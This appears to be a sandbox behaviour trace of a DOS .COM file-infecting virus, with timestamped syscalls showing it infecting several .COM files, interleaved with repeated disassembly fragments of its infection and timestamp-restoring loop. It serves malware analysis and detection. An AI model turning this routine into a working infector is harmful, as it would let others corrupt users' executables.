Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.294

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:59:20.20129851Z 26 PC: 12d86 | Set disk transfer address
2018-12-17T21:59:20.202660469Z 78 PC: 12d8f | Find first file
2018-12-17T21:59:20.208100488Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.209191506Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.212208705Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.213715605Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.229612163Z 61 PC: 12dd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:59:20.236755372Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.24420457Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.245502621Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.246801326Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.250101855Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.251432849Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.259024194Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.262166695Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.264481577Z 64 PC: 12e44 | Write file or device (Write 32 bytes on handle 5)
2018-12-17T21:59:20.267393289Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.269831275Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.280490381Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.283318188Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.285558937Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.288273029Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.289302517Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.29177788Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.293576604Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.304055414Z 61 PC: 12dd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:59:20.308586475Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.312966548Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.313989057Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.315435682Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.318215163Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.319537304Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.322053006Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.325211281Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.32780499Z 64 PC: 12e44 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T21:59:20.330353423Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.33250472Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.339699018Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.341417394Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.343232261Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.345659727Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.346666343Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.357726257Z 61 PC: 12dd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:59:20.364648526Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.371535533Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.373481441Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.375124904Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.377032186Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.378648205Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.380607216Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.382206511Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.384293534Z 64 PC: 12e44 | Write file or device (Write 165 bytes on handle 5)
2018-12-17T21:59:20.389492198Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.390911307Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.398862442Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.401353338Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.402360684Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.404824018Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.406119512Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.415724293Z 61 PC: 12dd1 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:59:20.422604407Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.429796259Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.431048254Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.432193207Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.434763802Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.435945379Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.4383395Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.441455132Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.443356508Z 64 PC: 12e44 | Write file or device (Write 168 bytes on handle 5)
2018-12-17T21:59:20.445825949Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.447903226Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.4551086Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.457327242Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.45869909Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.461204638Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.462543684Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.465407944Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.466578549Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.476053154Z 61 PC: 12dd1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:59:20.483200912Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.487274294Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.488360943Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.489917464Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.491784297Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.492856305Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.495477813Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.496924294Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.499083968Z 64 PC: 12e44 | Write file or device (Write 168 bytes on handle 5)
2018-12-17T21:59:20.50303598Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.504737934Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.512294211Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.515346937Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.516673056Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.527276832Z 61 PC: 12dd1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:59:20.534663869Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.541134032Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.542343131Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.544151257Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.5468547Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.548247194Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.756484026Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.759038369Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.761566998Z 64 PC: 12e44 | Write file or device (Write 43 bytes on handle 5)
2018-12-17T21:59:20.765357897Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.767483375Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.882630819Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.885802652Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.886858783Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.896801206Z 61 PC: 12dd1 | Open file (Filename = 'PAH.COM')
2018-12-17T21:59:20.904136811Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.911172552Z 66 PC: 12dfc | Move file pointer
2018-12-17T21:59:20.912853963Z 87 PC: 12e01 | Get or set file date and time
2018-12-17T21:59:20.914829465Z 64 PC: 12e14 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T21:59:20.917318712Z 66 PC: 12e1d | Move file pointer
2018-12-17T21:59:20.918588325Z 64 PC: 12e28 | Write file or device (Write 294 bytes on handle 5)
2018-12-17T21:59:20.922732594Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
0x12e2f: mov al, cl
0x12e31: mov ax, 0x2c00
0x12e34: int 0x21
0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
2018-12-17T21:59:20.925155545Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
0x12e38: add cl, al
0x12e3a: ror cl, 1
0x12e3c: xor ch, ch
0x12e3e: xor dx, dx
0x12e40: mov ah, 0x40
0x12e42: int 0x21
0x12e44: mov cx, word ptr [0x22a]
0x12e48: mov dx, word ptr [0x228]
0x12e4c: mov ax, 0x5701
0x12e4f: int 0x21
0x12e51: mov ah, 0x3e
0x12e53: int 0x21
0x12e55: mov ah, 0x4f
0x12e57: jmp 0x12d89
0x12e5a: mov ah, 0x1a
0x12e5c: mov dx, 0x80
0x12e5f: int 0x21
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]
2018-12-17T21:59:20.927261528Z 64 PC: 12e44 | Write file or device (Write 46 bytes on handle 5)
2018-12-17T21:59:20.930119603Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.932038361Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.939221001Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.941907944Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.943536836Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.952890788Z 61 PC: 12dd1 | Open file (Filename = 'TEST.COM')
2018-12-17T21:59:20.960069015Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.962969513Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.965260056Z 26 PC: 12e61 | Set disk transfer address
2018-12-17T21:59:20.966316911Z 9 PC: 12a47 | Display string (String= '-=-=-= WARNING!! VIRUS RELEASED! =-=-=- NORMAL CARRIER FILE SIZE IS 800 BYTES (C) 1994 - SECTOR INFECTOR INC ')